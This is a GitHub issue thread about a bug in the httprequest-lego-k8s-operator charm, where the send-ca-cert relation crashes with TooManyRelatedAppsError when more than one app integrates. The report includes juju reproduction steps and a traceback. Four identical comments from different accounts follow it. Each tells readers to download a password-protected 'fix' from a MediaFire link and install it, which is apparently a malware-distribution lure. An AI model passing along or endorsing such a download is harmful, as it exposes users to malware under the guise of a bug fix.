### ISSUE TITLE
send-ca-cert relation limit of 1 due to https://github.com/canonical/lego-base-k8s-operator/issues/166

### ISSUE THREAD

**Issue by shipperizer** [canonical/httprequest-lego-k8s-operator#202]
### Bug Description

operator still has the old version of the lego base operator library

that was patched with  https://github.com/canonical/lego-base-k8s-operator/pull/167 and it would be good to have this ported here

### To Reproduce

```
juju deploy httprequest-lego-k8s
juju deploy grafana-k8s
juju deploy traefik-k8s

juju integrate grafana-k8s httprequest-lego-k8s
juju integrate traefik-k8s httprequest-lego-k8s
```

### Environment

`latest/edge`

### Relevant log output

```shell
2024-08-22T12:34:49.080Z [container-agent] 2024-08-22 12:34:49 ERROR juju-log send-ca-cert:32: Uncaught exception while in charm code:
2024-08-22T12:34:49.080Z [container-agent] Traceback (most recent call last):
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/./src/charm.py", line 97, in <module>
2024-08-22T12:34:49.080Z [container-agent]     main(HTTPRequestLegoK8s)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/main.py", line 551, in main
2024-08-22T12:34:49.080Z [container-agent]     manager.run()
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/main.py", line 530, in run
2024-08-22T12:34:49.080Z [container-agent]     self._emit()
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/main.py", line 519, in _emit
2024-08-22T12:34:49.080Z [container-agent]     _emit_charm_event(self.charm, self.dispatcher.event_name)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/main.py", line 147, in _emit_charm_event
2024-08-22T12:34:49.080Z [container-agent]     event_to_emit.emit(*args, **kwargs)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/framework.py", line 348, in emit
2024-08-22T12:34:49.080Z [container-agent]     framework._emit(event)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/framework.py", line 860, in _emit
2024-08-22T12:34:49.080Z [container-agent]     self._reemit(event_path)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/framework.py", line 950, in _reemit
2024-08-22T12:34:49.080Z [container-agent]     custom_handler(event)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/lib/charms/lego_base_k8s/v0/lego_client.py", line 181, in _configure
2024-08-22T12:34:49.080Z [container-agent]     if self._is_relation_created(CA_TRANSFER_RELATION_NAME):
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/lib/charms/lego_base_k8s/v0/lego_client.py", line 317, in _is_relation_created
2024-08-22T12:34:49.080Z [container-agent]     return bool(self.model.get_relation(relation_name))
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/model.py", line 245, in get_relation
2024-08-22T12:34:49.080Z [container-agent]     return self.relations._get_unique(relation_name, relation_id)
2024-08-22T12:34:49.080Z [container-agent]   File "/var/lib/juju/agents/unit-httprequest-lego-k8s-0/charm/venv/ops/model.py", line 939, in _get_unique
2024-08-22T12:34:49.080Z [container-agent]     raise TooManyRelatedAppsError(relation_name, num_related, 1)
2024-08-22T12:34:49.080Z [container-agent] ops.model.TooManyRelatedAppsError: Too many remote applications on send-ca-cert (2 > 1)
2024-08-22T12:34:49.316Z [container-agent] 2024-08-22 12:34:49 ERROR juju.worker.uniter.operation runhook.go:180 hook "send-ca-cert-relation-joined" (via hook dispatching script: dispatch) failed: exit status 1
```
```


### Additional context

_No response_

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
